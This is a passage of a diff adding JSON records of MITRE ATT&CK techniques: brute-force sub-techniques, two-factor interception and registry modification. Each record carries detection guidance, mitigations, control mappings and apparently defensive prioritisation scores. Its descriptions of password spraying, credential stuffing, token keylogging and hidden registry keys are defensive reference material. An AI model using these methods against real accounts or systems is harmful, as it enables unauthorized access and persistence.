+        "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.",
+        "platforms": [
+            "Azure AD",
+            "Containers",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Command: Command Execution",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1110.001",
+                "name": "Brute Force: Password Guessing",
+                "url": "https://attack.mitre.org/techniques/T1110/001",
+                "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.\n\nGuessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nTypically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
+                "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
+                "mitigations": [
+                    {
+                        "mid": "M1036",
+                        "name": "Account Use Policies",
+                        "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1036"
+                    },
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    }
+                ]
+            },
+            {
+                "tid": "T1110.002",
+                "name": "Brute Force: Password Cracking",
+                "url": "https://attack.mitre.org/techniques/T1110/002",
+                "description": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.",
+                "detection": "It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).",
+                "mitigations": [
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    }
+                ]
+            },
+            {
+                "tid": "T1110.003",
+                "name": "Brute Force: Password Spraying",
+                "url": "https://attack.mitre.org/techniques/T1110/003",
+                "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
+                "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.\n\nConsider the following event IDs:(Citation: Trimarc Detecting Password Spraying)\n\n* Domain Controllers: \"Audit Logon\" (Success & Failure) for event ID 4625.\n* Domain Controllers: \"Audit Kerberos Authentication Service\" (Success & Failure) for event ID 4771.\n* All systems: \"Audit Logon\" (Success & Failure) for event ID 4648.",
+                "mitigations": [
+                    {
+                        "mid": "M1036",
+                        "name": "Account Use Policies",
+                        "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1036"
+                    },
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    }
+                ]
+            },
+            {
+                "tid": "T1110.004",
+                "name": "Brute Force: Credential Stuffing",
+                "url": "https://attack.mitre.org/techniques/T1110/004",
+                "description": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\n\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)",
+                "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
+                "mitigations": [
+                    {
+                        "mid": "M1036",
+                        "name": "Account Use Policies",
+                        "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1036"
+                    },
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1036",
+                "name": "Account Use Policies",
+                "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1036"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.8711880166666668,
+        "adjusted_score": 0.8711880166666668,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.2",
+            "5.3",
+            "6.3",
+            "6.4",
+            "6.5",
+            "4.10"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "AC-7",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "IA-11",
+            "IA-2",
+            "IA-4",
+            "IA-5",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.46666666666666673,
+            "mitigation_score": 0.4,
+            "detection_score": 0.54
+        },
+        "choke_point_score": 0.4,
+        "prevalence_score": 0.00452135
+    },
+    {
+        "tid": "T1110.001",
+        "name": "Brute Force: Password Guessing",
+        "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.\n\nGuessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nTypically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
+        "url": "https://attack.mitre.org/techniques/T1110/001",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
+        "platforms": [
+            "Azure AD",
+            "Containers",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1110",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1036",
+                "name": "Account Use Policies",
+                "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1036"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            }
+        ],
+        "cumulative_score": 0.3571428571428571,
+        "adjusted_score": 0.3571428571428571,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.2",
+            "6.3",
+            "6.4",
+            "6.5",
+            "4.10"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "AC-7",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "IA-11",
+            "IA-2",
+            "IA-4",
+            "IA-5",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1110.002",
+        "name": "Brute Force: Password Cracking",
+        "description": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.",
+        "url": "https://attack.mitre.org/techniques/T1110/002",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).",
+        "platforms": [
+            "Azure AD",
+            "Linux",
+            "Office 365",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1110",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            }
+        ],
+        "cumulative_score": 0.28571428571428575,
+        "adjusted_score": 0.28571428571428575,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.7",
+            "5.2",
+            "6.3",
+            "6.4",
+            "6.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "AC-7",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "IA-11",
+            "IA-2",
+            "IA-4",
+            "IA-5",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1110.003",
+        "name": "Brute Force: Password Spraying",
+        "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
+        "url": "https://attack.mitre.org/techniques/T1110/003",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.\n\nConsider the following event IDs:(Citation: Trimarc Detecting Password Spraying)\n\n* Domain Controllers: \"Audit Logon\" (Success & Failure) for event ID 4625.\n* Domain Controllers: \"Audit Kerberos Authentication Service\" (Success & Failure) for event ID 4771.\n* All systems: \"Audit Logon\" (Success & Failure) for event ID 4648.",
+        "platforms": [
+            "Azure AD",
+            "Containers",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1110",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1036",
+                "name": "Account Use Policies",
+                "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1036"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            }
+        ],
+        "cumulative_score": 0.4380952380952381,
+        "adjusted_score": 0.4380952380952381,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.2",
+            "6.3",
+            "6.4",
+            "6.5",
+            "4.10"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "AC-7",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "IA-11",
+            "IA-2",
+            "IA-4",
+            "IA-5",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1110.004",
+        "name": "Brute Force: Credential Stuffing",
+        "description": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\n\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)",
+        "url": "https://attack.mitre.org/techniques/T1110/004",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
+        "platforms": [
+            "Azure AD",
+            "Containers",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1110",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1036",
+                "name": "Account Use Policies",
+                "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1036"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.33333333333333337,
+        "adjusted_score": 0.33333333333333337,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.2",
+            "5.3",
+            "6.3",
+            "6.4",
+            "6.5",
+            "4.10"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "AC-7",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "IA-11",
+            "IA-2",
+            "IA-4",
+            "IA-5",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1111",
+        "name": "Two-Factor Authentication Interception",
+        "description": "Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)",
+        "url": "https://attack.mitre.org/techniques/T1111",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.\n\nSimilar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Driver: Driver Load",
+            "Process: OS API Execution",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.3404761904761905,
+        "adjusted_score": 0.3404761904761905,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "14.1",
+            "14.3"
+        ],
+        "nist_controls": [
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.09047619047619047,
+            "mitigation_score": 0.16363636363636364,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.25,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1112",
+        "name": "Modify Registry",
+        "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.",
+        "url": "https://attack.mitre.org/techniques/T1112",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Deletion",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
+            }
+        ],
+        "cumulative_score": 1.6047619047619048,
+        "adjusted_score": 1.6047619047619048,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "CM-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.5047619047619047,
+            "mitigation_score": 0.05454545454545454,
